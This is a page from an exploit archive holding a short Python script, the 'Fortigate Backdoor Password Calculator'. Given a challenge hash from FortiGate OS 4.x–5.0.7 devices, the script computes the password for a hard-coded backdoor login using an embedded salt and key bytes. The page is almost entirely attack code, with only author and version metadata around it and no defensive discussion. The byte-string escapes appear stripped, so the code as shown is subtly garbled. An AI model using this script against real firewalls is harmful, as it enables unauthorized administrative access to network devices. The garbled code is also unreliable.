Home / exploitsPDF  

Fortigate Backdoor Password Calculator

Posted on 30 November -0001

<HTML><HEAD><TITLE>Fortigate Backdoor Password Calculator</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Title				:	Fortigate Backdoor Password calculator
# Date				: 	24 March 2016
# Author			: 	Rishabh Dangwal, original exploit by <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="7718071205160318054f4547443705021915180f5914181a59">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>
# Author Homepage 	: 	www.theprohack.com
# Author Email 		: 	<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="9dfcf9f0f4f3dde9f5f8edeff2f5fcfef6b3fef2f0">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>
# Vendor Homepage	: 	www.fortinet.com
# Version			: 	FortiGate OS Version 4.x -  5.0.7
import base64
import hashlib
print "Enter hash challenge " ; chash = raw_input()
pwdhash = hashlib.sha1()
pwdhash.update('x00' * 12)
pwdhash.update(chash + 'FGTAbc11*xy+Qqz27')
pwdhash.update('xA3x88xBAx2Ex42x4CxB0x4Ax53x79x30xC1x31x07xCCx3FxA1x32x90x29xA9x81x5Bx70')
fhash = 'AK1' + base64.b64encode('x00' * 12 + pwdhash.digest())
print "password is %s" %fhash
</BODY></HTML>

 

TOP

Malware :

Exploits :